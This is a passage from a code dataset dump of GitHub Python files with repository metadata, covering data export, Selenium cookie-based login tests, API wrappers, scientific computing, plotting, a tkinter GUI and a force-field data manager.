Allowed types are: %s'\n % (out_types, ok_types))\n\n # Now write any tsv's.\n def write_tsv_line(f, row_tpl):\n f.write('\\t'.join(list(row_tpl)) + '\\n')\n\n # Open the tsv files.\n tsv_files = {}\n for output_type in out_types:\n tsv_files[output_type] = open('%s_%s.tsv' % (out_base, output_type),\n 'w')\n\n # Write the tsv files.\n short_set = set()\n very_short_set = set()\n for h, d in relation_dict.items():\n # Do some pre-processing\n roles = sorted([ag_tpl[1] for ag_tpl in d['agents']])\n ag_by_roles = dict.fromkeys(roles)\n for role in roles:\n ag_by_roles[role] = [ag_tpl[-1] for ag_tpl in d['agents']\n if ag_tpl[1] == role]\n if roles == ['OBJECT', 'SUBJECT']:\n data_tpls = [(ag_by_roles['SUBJECT'][0], ag_by_roles['OBJECT'][0],\n d['type'], str(h))]\n elif set(roles) == {'OTHER'}:\n data_tpls = [(a, b, d['type'], str(h))\n for a, b in permutations(ag_by_roles['OTHER'], 2)]\n elif d['type'] == 'Conversion':\n continue # TODO: Handle conversions.\n else:\n print(\"This is weird...\", h, d)\n continue\n\n # Handle writing the various files.\n if 'full_tsv' in out_types:\n for data_tpl in data_tpls:\n write_tsv_line(tsv_files['full_tsv'], data_tpl)\n\n if 'short_tsv' in out_types:\n short_tpls = [t[:-1] for t in data_tpls]\n for t in short_tpls:\n if t not in short_set:\n short_set.add(t)\n write_tsv_line(tsv_files['short_tsv'], t)\n\n if 'pairs_tsv' in out_types:\n vs_tpls = {tuple(sorted(t[:-2])) for t in data_tpls}\n for t in vs_tpls:\n if t not in very_short_set:\n very_short_set.add(t)\n write_tsv_line(tsv_files['pairs_tsv'], t)\n\n # Close the tsv files.\n for file_handle in tsv_files.values():\n file_handle.close()\n\n return relation_dict\n","repo_name":"indralab/indra_db","sub_path":"indra_db/client/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":9034,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"}
{"seq_id":"18860169736","text":"import json\nfrom time import sleep\n\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\nclass TestTmp():\n @pytest.fixture(autouse=True)\n def setup_and_teardown(self):\n chrome_arg = webdriver.ChromeOptions()\n chrome_arg.debugger_address = '127.0.0.1:9222'\n # Debug by attaching to a locally opened browser; you must already be logged in to WeCom (WeChat Work)\n self.driver = webdriver.Chrome(options=chrome_arg)\n # self.driver = webdriver.Chrome()\n yield\n self.driver.quit()\n\n\n def test_cookie_login(self):\n \"\"\"\n Log in using cookies\n :return:\n \"\"\"\n # Save cookies\n cookies = self.driver.get_cookies()\n with open(\"tmp2.text\",\"w\", encoding=\"utf-8\") as f:\n json.dump(cookies, f)\n\n # Load cookies\n # self.driver.get(\"https://work.weixin.qq.com/wework_admin/frame#index\")\n # with open(\"tmp2.text\", \"r\", encoding=\"utf-8\") as f:\n # # Deserialize\n # cookies = json.load(f)\n # for i in cookies:\n # self.driver.add_cookie(i)\n # self.driver.refresh()\n # sleep(6)\n\n # Used when reusing an already-open browser\n def test_login_tmp(self):\n self.driver.get(\"https://work.weixin.qq.com/wework_admin/frame\")\n self.driver.find_element(By.XPATH,'//*[@id=\"menu_apps\"]/span').click()\n\nif __name__ == \"__main__\":\n pytest.main([\"-v\",\"-s\"])","repo_name":"JsoloJ/Hogwarts_CK17_test","sub_path":"test_selenium/selenium_demo.py","file_name":"selenium_demo.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"4547368267","text":"from . 
import Accounts, Profiles, Quote, Transfer\nfrom .exceptions import UndefinedAPI\n\n\nclass BaseCreateByObject:\n api = None\n attributes_map = {}\n\n def __init__(\n self, api_base_url, api_token, private_key_path,\n private_key_passphrase=None):\n if self.api is None:\n raise UndefinedAPI()\n\n self._api = self.api(\n api_base_url, api_token, private_key_path, private_key_passphrase)\n self._methods = [\n method_name for method_name in dir(self._api)\n if callable(getattr(self._api, method_name)) and\n not method_name.startswith('_')]\n\n def __call_method(self, method_name):\n def method(**kwargs):\n for key, value in self.attributes_map.get(method_name, {}).items():\n if key in kwargs:\n continue\n\n val = getattr(self, value)\n if callable(val):\n kwargs[key] = val()\n else:\n kwargs[key] = val\n\n method = getattr(self._api, method_name)\n print(kwargs)\n return method(**kwargs)\n return method\n\n def __getattr__(self, method_name):\n if method_name in self._methods:\n return self.__call_method(method_name)\n # Fail normal attribute lookup for unknown names.\n raise AttributeError(method_name)\n\n\nclass Accounts(BaseCreateByObject):\n api = Accounts\n\n\nclass Profiles(BaseCreateByObject):\n api = Profiles\n\n\nclass Quote(BaseCreateByObject):\n api = Quote\n\n\nclass Transfer(BaseCreateByObject):\n api = Transfer\n","repo_name":"useme-com/transferwise","sub_path":"transferwise/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"29724705828","text":"import json\nfrom typing import Dict, Text, List\n\n\ndef load_json(file_path: Text) -> List[Dict]:\n with open(file_path, 'r') as f:\n config = json.load(f)\n\n return config\n\n\ndef write_json(data, file_path, encoding='utf-8'):\n with open(file_path, 'w', encoding=encoding) as pf:\n json.dump(data, pf, ensure_ascii=False, indent=4)\n\n\ndef load_jsonl(file_path: Text) -> List[Dict]:\n data = []\n with open(file_path, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n data.append(json.loads(line))\n return data\n\n\ndef write_jsonl(file_path, data):\n with open(file_path, 'w') as pf:\n for item in data:\n obj = json.dumps(item, ensure_ascii=False)\n pf.write(obj + '\\n')\n","repo_name":"phuongnam2002/Spalde","sub_path":"utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"25424391060","text":"\"\"\"Data Integrity Fingerprint (DIF).\n\nA reference implementation in Python.\n\nFor specification see https://github.com/expyriment/DIF.\n\n\"\"\"\n\n__author__ = 'Oliver Lindemann <oliver@expyriment.org>, ' \\\n 'Florian Krause <florian@expyriment.org>'\n\n__version__ = '0.7.6'\n\n\nfrom .dif import DataIntegrityFingerprint\n","repo_name":"expyriment/dataintegrityfingerprint-python","sub_path":"src/dataintegrityfingerprint/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"33797155938","text":"#!/usr/bin/python3\n# -*-coding:utf-8 -*-\n\n# Reference:**********************************************\n# @Time : 7/23/2020 4:15 PM\n# @Author : Gaopeng.Bai\n# @File : resolution_pixels.py\n# @User : gaope\n# @Software: PyCharm\n# @Description:\n# Reference:**********************************************\n# coding=utf-8\nimport os #\nfrom PIL import Image\nimport re\nimport cv2\n\n\ndef resize_pixels(image, new_path):\n resize_width = 
580\n resize_depth = 580\n\n im = Image.open(image)\n w, h = im.size\n if w < resize_width:\n h_new = int(resize_width * h / w)\n w_new = resize_width\n out = im.resize((w_new, h_new), Image.ANTIALIAS)\n out.save(new_path)\n repair(new_path)\n\n if h < resize_depth:\n h_new = int(resize_depth * w / h)\n w_new = resize_depth\n out = im.resize((h_new, w_new), Image.ANTIALIAS)\n out.save(new_path)\n repair(new_path)\n\n\ndef repair(images):\n im = cv2.imread(images) # Read the image (OpenCV loads it in BGR format)\n image = Image.fromarray(cv2.cvtColor(im, cv2.COLOR_BGR2RGB)) # Convert format: BGR to RGB\n image.save(images, quality=95, dpi=(300.0, 300.0)) # Set the image resolution to 300 dpi; the value can be changed\n","repo_name":"Gaopeng-Bai/DocEstate","sub_path":"Operations/resolution_pixels.py","file_name":"resolution_pixels.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"5689222199","text":"# Configuration file for the Sphinx documentation builder.\n#\n# For the full list of built-in configuration values, see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nimport pathlib\nimport sys\n\nsys.path.insert(0, pathlib.Path(__file__).parents[2].resolve().as_posix())\n\nproject = \"ML UI\"\ncopyright = \"2022, SPbU\"\nauthor = \"SPbU\"\nrelease = \"0.1\"\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nsource_suffix = {\n \".rst\": \"restructuredtext\",\n \".txt\": \"markdown\",\n \".md\": \"markdown\",\n}\n\nextensions = [\n \"myst_parser\",\n \"sphinx.ext.viewcode\",\n \"sphinx.ext.autodoc\",\n]\n\ntemplates_path = [\"_templates\"]\nexclude_patterns = []\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\nhtml_theme = \"furo\"\n","repo_name":"quantum-entangled/machine-learning-ui","sub_path":"docs/src/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"23403434474","text":"import argparse as ap\nimport logging\n\nfrom cheriplot.core.tool import PlotTool\nfrom cheriplot.plot.provenance import ExecCapLoadStoreScatterPlot\n\nlogger = logging.getLogger(__name__)\n\n\nclass ExecCapScatterPlotTool(PlotTool):\n\n description = \"Scatter plot showing the locations where executable \" \\\n \"capabilities are stored.\"\n\n def init_arguments(self):\n super().init_arguments()\n self.parser.add_argument(\"-m\", \"--vmmap-file\",\n help=\"CSV file containing the VM map dump\"\n \" generated by procstat\", required=True)\n\n def _run(self, args):\n plot = ExecCapLoadStoreScatterPlot(args.trace, args.cache)\n\n plot.set_vmmap(args.vmmap_file)\n\n if args.outfile:\n plot.plot_file = args.outfile\n\n plot.show()\n\ndef main():\n tool = ExecCapScatterPlotTool()\n tool.run()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CTSRD-CHERI/cheriplot","sub_path":"tools/cap_exec_scatter.py","file_name":"cap_exec_scatter.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"33381362600","text":"import numpy as np\r\nimport 
tensorflow as tf\r\n\r\ndef directed_hausdorff(point_cloud_A, point_cloud_B):\r\n '''\r\n input:\r\n point_cloud_A: Tensor, B x N x 3\r\n point_cloud_B: Tensor, B x N x 3\r\n return:\r\n Tensor, B, directed hausdorff distance, A -> B\r\n '''\r\n npoint = point_cloud_A.shape[1]\r\n\r\n A = tf.expand_dims(point_cloud_A, axis=2) # (B, N, 1, 3)\r\n A = tf.tile(A, (1, 1, npoint, 1)) # (B, N, N, 3)\r\n\r\n B = tf.expand_dims(point_cloud_B, axis=1) # (B, 1, N, 3)\r\n B = tf.tile(B, (1, npoint, 1, 1)) # (B, N, N, 3)\r\n\r\n distances = tf.squared_difference(B, A) # (B, N, N, 3)\r\n distances = tf.reduce_sum(distances, axis=-1) # (B, N, N, 1)\r\n distances = tf.sqrt(distances) # (B, N, N)\r\n\r\n shortest_dists, _ = tf.nn.top_k(-distances)\r\n shortest_dists = tf.squeeze(-shortest_dists) # (B, N)\r\n\r\n hausdorff_dists, _ = tf.nn.top_k(shortest_dists) # (B, 1)\r\n hausdorff_dists = tf.squeeze(hausdorff_dists)\r\n\r\n return hausdorff_dists\r\n\r\nif __name__=='__main__':\r\n u = np.array([\r\n [\r\n [1,0],\r\n [0,1],\r\n [-1,0],\r\n [0,-1]\r\n ], \r\n [\r\n [1,0],\r\n [0,1],\r\n [-1,0],\r\n [0,-1]\r\n ]\r\n ])\r\n\r\n v = np.array([\r\n [\r\n [2,0],\r\n [0,2],\r\n [-2,0],\r\n [0,-4]\r\n ], \r\n [\r\n [2,0],\r\n [0,2],\r\n [-2,0],\r\n [0,-4]\r\n ]\r\n ])\r\n u_tensor = tf.constant(u, dtype=tf.float32)\r\n u_tensor = tf.tile(u_tensor, (1,500,1))\r\n v_tensor = tf.constant(v, dtype=tf.float32)\r\n v_tensor = tf.tile(v_tensor, (1,500,1))\r\n distances = directed_hausdorff(u_tensor, v_tensor)\r\n distances1 = directed_hausdorff(v_tensor, u_tensor)\r\n\r\n with tf.Session() as sess:\r\n # Init variables\r\n init = tf.global_variables_initializer()\r\n sess.run(init)\r\n\r\n d_val = sess.run(distances)\r\n print(d_val)\r\n print(d_val.shape)\r\n\r\n d_val1 = sess.run(distances1)\r\n print(d_val1)\r\n print(d_val1.shape)\r\n","repo_name":"xuelin-chen/pcl2pcl-gan-pub","sub_path":"pc2pc/structural_losses_utils/tf_hausdorff_distance.py","file_name":"tf_hausdorff_distance.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"53"} +{"seq_id":"30633780459","text":"import flywheel\nimport datetime\n\n# Initialize gear stuff\nnow = datetime.datetime.now().strftime(\"%y/%m/%d_%H:%M\")\nfw = flywheel.Client()\nproj = fw.projects.find_first('label=AGTC_OL')\nsubjects = proj.subjects()\nanalyses = fw.get_analyses('projects', proj.id, 'sessions')\nstruct = [ana for ana in analyses if ana.label.startswith('hcp-struct')]\nfunc = [ana for ana in analyses if ana.label.startswith('hcp-func')]\nsessions_that_have_func = []\nfor f in func:\n sessions_that_have_func.append(f.parent.id)\nqp = fw.lookup('gears/hcp-func/0.1.7')\nanalysis_label = 'hcp-func %s' % qp.gear.version\n\nfreesurfer_license = proj.get_file('freesurfer_license.txt')\ncoef_grad = proj.get_file('coeff.grad')\n\n\nfor subject in subjects:\n subject_id = subject.label\n if subject_id != 'HEROgka1':\n sessions = subject.sessions()\n for session in sessions:\n if session.id not in sessions_that_have_func:\n for st in struct:\n if subject.id == st.parents.subject:\n struct_gear = st\n struct_result = struct_gear.get_file(subject_id + '_hcpstruct.zip')\n \n acquisition_list=[]\n acquisitions = session.acquisitions()\n for acquisition in acquisitions:\n if acquisition.label == 'fmap_dir-AP_acq-SpinEchoFieldMap':\n spin_echo_negative = acquisition \n spin_echo_negative = spin_echo_negative.files[1]\n if acquisition.label == 'fmap_dir-PA_acq-SpinEchoFieldMap':\n spin_echo_positive 
= acquisition\n spin_echo_positive = spin_echo_positive.files[1]\n \n inputs = {'FreeSurferLicense': freesurfer_license, 'GradientCoeff': coef_grad, \n 'SpinEchoNegative': spin_echo_negative, 'SpinEchoPositive': spin_echo_positive,\n 'StructZip': struct_result}\n \n\n config = {'AnatomyRegDOF': 6, 'BiasCorrection': 'SEBased', 'MotionCorrection': 'MCFLIRT',\n 'RegName': 'FS', 'Subject': subject_id}\n \n for acquisition in acquisitions:\n if 'func_task' in acquisition.label and 'SBRef' not in acquisition.label and 'PhysioLog' not in acquisition.label:\n acq = acquisition \n label = acquisition.label\n for i in acq.files:\n if 'nii.gz' in i.name:\n acquisition_to_run = i \n for ref in acquisitions:\n if label + '_SBRef' == ref.label:\n scout = ref.files[1]\n inputs['fMRIScout'] = scout \n inputs['fMRITimeSeries'] = acquisition_to_run\n config['fMRIName'] = label[10:] \n new_analysis_label = analysis_label + ' ' + '[' + label[10:] + ']' + ' ' + now\n _id = qp.run(analysis_label=new_analysis_label, config=config, \n inputs=inputs, destination=session)\n \n \n","repo_name":"gkaguirrelab/mriAGTCAnalysis","sub_path":"code/submitGears/AGTC_OL/2-submitHCPFunc.py","file_name":"2-submitHCPFunc.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7245427617","text":"import matplotlib.pyplot as plt\nimport pandas\nimport base64\nimport io\n\ndef percentage(pct, data):\n absolute = int(pct / 100. * sum(data))\n return \"{:.1f}%\\n({:d})\".format(pct, absolute)\n\ndef generatePieChart(params):\n column_list = [\"sl_no\", \"gender\", \"ssc_p\", \"ssc_b\", \"hsc_p\", \"hsc_b\", \"hsc_s\", \"degree_p\", \"degree_t\", \"workexp\",\n \"etest_p\", \"specialisation\", \"mba_p\", \"status\", \"salary\"]\n\n df = pandas.read_csv(\"codebase/datasets/dataset.csv\", usecols=column_list)\n\n if(params[\"filter\"][\"gender\"] != \"both\"):\n df = df[(df[\"gender\"] == params[\"filter\"][\"gender\"])]\n\n if (params[\"filter\"][\"subjects\"] != \"all\"):\n df = df[(df[\"degree_t\"] == params[\"filter\"][\"subjects\"])]\n\n labels = df[params[\"x_axis\"]]\n\n labelArr = []\n countArr = []\n\n for (label, count) in labels.value_counts().iteritems():\n labelArr.append(label)\n countArr.append(count)\n\n plt.clf()\n\n plt.title(\"Generated Chart\")\n patches, texts, junk = plt.pie(countArr, labels=labelArr, autopct=lambda pct: percentage(pct, countArr))\n\n if (params[\"filter\"][\"legend\"]):\n plt.legend(patches, labelArr)\n\n bytes = io.BytesIO()\n\n plt.savefig(bytes, format=\"jpg\")\n bytes.seek(0)\n\n b64 = base64.b64encode(bytes.read()).decode(\"ascii\")\n\n return b64","repo_name":"Sarthakbh321/DV-Project-Backend","sub_path":"codebase/pie_chart.py","file_name":"pie_chart.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"3188719319","text":"import pandas as pd\nfrom pymatgen.analysis.graphs import StructureGraph\nfrom pymatgen.analysis.local_env import CrystalNN\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n\n \"\"\"\n >>> df = pd.read_pickle(\"out/selenium_stable_bandgap.pkl\")\n \n >>> type(df)\n \n \n >>> len(df)\n 1830\n \n >>> df.columns\n Index(['structure', 'band_gap'], dtype='object')\n \n >>> type(df['structure'])\n \n \n >>> type(df['structure'][0])\n \n \n >>> print(df['structure'][0])\n Full Formula (Lu1 Tl1 Se2)\n Reduced Formula: LuTlSe2\n abc : 8.125496 
8.125496 8.125495\n angles: 29.329221 29.329221 29.329219\n Sites (4)\n # SP a b c magmom\n --- ---- -------- -------- -------- --------\n 0 Lu 0 0 0 0\n 1 Tl 0.5 0.5 0.5 -0\n 2 Se 0.733155 0.733155 0.733155 0\n 3 Se 0.266845 0.266845 0.266845 0\n \n >>> type(df['band_gap'])\n \n \n >>> type(df['band_gap'][0])\n \n \n >>> print(df['band_gap'][0])\n 1.2344\n \"\"\"\n # df = pd.read_pickle(\"out/selenium_stable_bandgap.pkl\")\n df = pd.read_pickle(\"out/all_stable_bandgap.pkl\")\n\n names = {}\n elements = {i: 0 for i in range(1, 119)}\n\n for i in range(len(df['structure'])):\n struct = df['structure'][i]\n\n # if struct.formula == \"Li2 Zn2\":\n # struct = struct*2\n # gr = StructureGraph.with_local_env_strategy(struct, CrystalNN())\n # labels = {i:spec.name for i, spec in enumerate(struct.species)}\n # nx.draw(gr.graph, pos=nx.shell_layout(gr.graph), with_labels=True, labels=labels)\n # plt.show()\n # break\n\n # if 'Li' in struct.symbol_set:\n # print(struct.formula)\n\n for spec in struct.species:\n if not spec.name in names:\n names[spec.name] = 0\n names[spec.name] += 1\n\n elements[spec.number] += 1\n\n print(len(df))\n print(len(names))\n print(names)\n for i in sorted(elements):\n print(i, elements[i])\n","repo_name":"lantunes/materials-sandbox","sub_path":"analyze_se_data.py","file_name":"analyze_se_data.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36453560489","text":"import tkinter as tk\r\nfrom tkcalendar import Calendar\r\nfrom tkinter import messagebox\r\n\r\ndef add_event():\r\n add_event_win = tk.Tk()\r\n add_event_win.geometry (\"600x400\")\r\n add_event_win.title(\"Add Event\")\r\n add_event_win.resizable(0,0)\r\n add_event_win.configure(bg = \"#212121\")\r\n \r\n cal = Calendar (add_event_win, selectmode = 'day', date_pattern = ('dd/mm/yyyy'), background = \"black\")\r\n cal.place(x= 330, y= 160)\r\n\r\n def choose_start_date():\r\n chosen_start_date = cal.get_date()\r\n chosen_start_date_label = tk.Label(\r\n middle_frame,\r\n text = chosen_start_date,\r\n font = ('Montserrat', '12'),\r\n background = \"#A8A803\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n chosen_start_date_label.place(x = 180, y = 5)\r\n \r\n def choose_end_date():\r\n chosen_end_date = cal.get_date()\r\n chosen_end_date_label = tk.Label(\r\n middle_frame,\r\n text = chosen_end_date,\r\n font = ('Montserrat', '12', 'bold'),\r\n background = \"#970000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n chosen_end_date_label.place(x = 180, y = 45)\r\n \r\n def exit_add_event():\r\n if len(event_description_row.get()) != 0:\r\n answer = messagebox.askyesno(\"Close Add Remark\", \"All changes will be lost.\\nDo you want to continue?\")\r\n if answer:\r\n add_event_win.destroy()\r\n else:\r\n pass\r\n elif len(field1_row.get()) != 0:\r\n answer = messagebox.askyesno(\"Close Add Remark\", \"All changes will be lost.\\nDo you want to continue?\")\r\n if answer:\r\n add_event_win.destroy()\r\n else:\r\n pass\r\n elif len(field2_row.get()) != 0:\r\n answer = messagebox.askyesno(\"Close Add Remark\", \"All changes will be lost.\\nDo you want to continue?\")\r\n if answer:\r\n add_event_win.destroy()\r\n else:\r\n pass\r\n else:\r\n add_event_win.destroy() \r\n\r\n header_label = tk.Label(\r\n add_event_win,\r\n text = \"NEW EVENT\",\r\n font = ('Montserrat', '15'),\r\n background = \"#212121\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n header_label.place(x = 240, y = 5)\r\n\r\n top_frame = tk.Frame(\r\n 
add_event_win,\r\n width = 570,\r\n height = 100,\r\n background = \"#2F3030\"\r\n )\r\n top_frame.place(x = 15, y = 40)\r\n\r\n event_description_label = tk.Label(\r\n top_frame,\r\n text = \"EVENT\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n event_description_label.place(x = 10, y = 5)\r\n\r\n event_description_row = tk.Entry(\r\n top_frame,\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n width = 56,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n event_description_row.place(x = 150, y = 5)\r\n\r\n field1_label = tk.Label(\r\n top_frame,\r\n text = \"Field 1\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n field1_label.place(x = 10, y = 35)\r\n\r\n field1_row = tk.Entry(\r\n top_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 56,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n field1_row.place(x = 150, y = 35)\r\n\r\n field2_label = tk.Label(\r\n top_frame,\r\n text = \"Field 2\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n field2_label.place(x = 10, y = 65)\r\n\r\n field2_row = tk.Entry(\r\n top_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 56,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n field2_row.place(x = 150, y = 65)\r\n\r\n middle_frame = tk.Frame(\r\n add_event_win,\r\n width = 305,\r\n height = 80,\r\n background = \"#2F3030\"\r\n )\r\n middle_frame.place(x = 15, y = 160)\r\n\r\n start_date_button = tk.Button(\r\n middle_frame,\r\n text = \"Choose Start Date\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 16,\r\n command = choose_start_date,\r\n background = '#464646',\r\n foreground = '#FFFFFF'\r\n )\r\n start_date_button.place(x = 10, y = 5)\r\n\r\n end_date_button = tk.Button(\r\n middle_frame,\r\n text = \"Choose End Date\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 16,\r\n command = choose_end_date,\r\n background = '#464646',\r\n foreground = '#FFFFFF'\r\n )\r\n end_date_button.place(x = 10, y = 45)\r\n\r\n\r\n save_button = tk.Button(\r\n add_event_win,\r\n text = \"SAVE\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 11,\r\n command = None,\r\n background = '#A8A803',\r\n foreground = '#FFFFFF'\r\n )\r\n save_button.place(x = 480, y = 360)\r\n\r\n exit_button = tk.Button(\r\n add_event_win,\r\n text = \"EXIT\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 11,\r\n command = exit_add_event,\r\n background = '#970000',\r\n foreground = '#FFFFFF'\r\n )\r\n exit_button.place(x = 370, y = 360)\r\n\r\n bottom_frame = tk.Frame(\r\n add_event_win,\r\n width = 305,\r\n height = 80,\r\n background = \"#2F3030\"\r\n )\r\n bottom_frame.place(x = 15, y = 265)\r\n\r\n start_time_label = tk.Label(\r\n bottom_frame,\r\n text = \"Start Time\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n start_time_label.place(x = 10, y = 5)\r\n\r\n start_time_row = tk.Entry(\r\n bottom_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 20,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n start_time_row.place(x = 150, y = 5)\r\n\r\n end_time_label = tk.Label(\r\n bottom_frame,\r\n text = \"End Time\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = 
\"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n end_time_label.place(x = 10, y = 35)\r\n\r\n end_time_row = tk.Entry(\r\n bottom_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 20,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n end_time_row.place(x = 150, y = 35)\r\n\r\n add_event_win.protocol(\"WM_DELETE_WINDOW\", exit_add_event)\r\n\r\n\r\n\r\n\r\n","repo_name":"RealLifeGeek/Time-Management-System","sub_path":"add_event.py","file_name":"add_event.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12549230610","text":"from pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport os\nimport json\nimport shutil\n\nclass DataManager():\n '''\n The class is used to manage MD simulations database for BO FF parameterization.\n BO uses a mesh, which nodes correspond to different values of FF parameters of interest.\n \"Nodal\" FF parameters are used to run MD simulations. \n DataManager:\n -- create a structure where each node\n \n \n Attributes\n ----------\n bounds : dict\n {resid: {param_name : [x_min, x_max]}}, resid and parameter names as specified in FF file\n df_ff : pandas.DataFrame\n df includes parameter value for each resid and parameter\n ff_fpath : pathlib.Path\n path to FF file\n ff_start: int\n line index to start reading FF file\n ff_end: int\n line index to stop reading FF file \n grid_spec: dictionary\n a dict to setup search space, where array [x_min, x_max, N_vertices] is assigned to each parameter,\n e.g.: {\"Li\" : {\"sigma\" : [0., 0.5, 1.]}}\n ndim : int\n number of dimensions (number of FF parameters to tune) \n nodes : dict\n { resid : {param_name : node_coodrs}}, node_coodrs - list of floats\n node_fpath : pathlib.Path\n path to grid configuration json file \n md_templ_path : pathlib.Path instance\n path to md template with simulation inputs and bash-executive files \n md_templ_path : pathlib.Path instance\n path to md template with simulation inputs and bash-executive files \n params - list\n a sorted list of \"resid parameter_name\" pairs\n root : pathlib.Path instance\n path to database dir\n\n Methods\n -------\n casedir_exists(mutliidx)\n checks if directory with the name according to given multiidx exists\n check_inclusion(pdict)\n checks if point pdict is inside of the bounds\n convert_to_pdict(plist)\n converts coordinates of a point written as a dict into coordinates as a list\n convert_to_plist(pdict)\n converts coordinates of a point written as a list into coordinates as a dict\n create_case(pdict)\n creates a folder named according to multiindex, modifies FF file in the folder\n get_multiidx(pdict)\n returns multiindex of the gride node closest to pdict\n get_node_dict():\n returns a dictionary with node coordinates\n make_casename(pdict)\n returns str - casename according to pdict\n _check_node_f(node_fpath):\n method check if grid_spec from a given json file is equivalent to class grid_spec\n _read_node_f(node_fpath):\n returns a dict read from a json file with node coordinates\n _read_ff_file(ff_fpath):\n reads specified ff file as a pandas DataFrame\n _save_node_f():\n writes dict with node coordinates self.nodes as a json file\n _save_ff_file(self, df, ff_fpath_out):\n writes ff parameters into a given ff file \n '''\n def __init__(self, root, md_templ, grid_spec, ff_fname, ff_start, ff_end, node_fname='_nodes.json'):\n \"\"\"\n Parameters\n ----------\n root - str\n a 
path to the database dir. If doesn't exist, it is to be created.\n md_templ - str\n a path to MD template folder with prepared simulation data and executable bash script\n grid_spec - dict\n a dict resid: {parameterX : [x_min, x_max, Nx]} , Nx - number of nodes for parameter x = x1 ... xN)\n ff_fname - str\n a file name of the file with specified force field parameters\n ff_start - int\n lines from ff_start to ff_end of file ff_fname are read as pandas.DataFrame\n ff_end - int\n lines from ff_start to ff_end of file ff_fname are read as pandas.DataFrame\n node_fname - str\n file name to save node coordinates for specified parametera\n \"\"\"\n if not isinstance(root, Path):\n root = Path(root)\n self.root = root\n\n self.md_templ = md_templ\n\n self.grid_spec = grid_spec\n params_ = []\n for resid in self.grid_spec:\n for param_name in self.grid_spec[resid]:\n params_.append((resid, param_name))\n params_ = sorted(params_)\n self.params = tuple(params_)\n self.ndim = len(self.params)\n\n bounds_, nodes_ = [], []\n for resid, param_name in self.params:\n x_min, x_max, Nx = self.grid_spec[resid][param_name]\n bounds_.append((x_min, x_max))\n nodes_.append(np.linspace(x_min, x_max, Nx))\n self.bounds =tuple(bounds_)\n self.nodes = tuple(nodes_)\n\n\n self.ff_fpath = 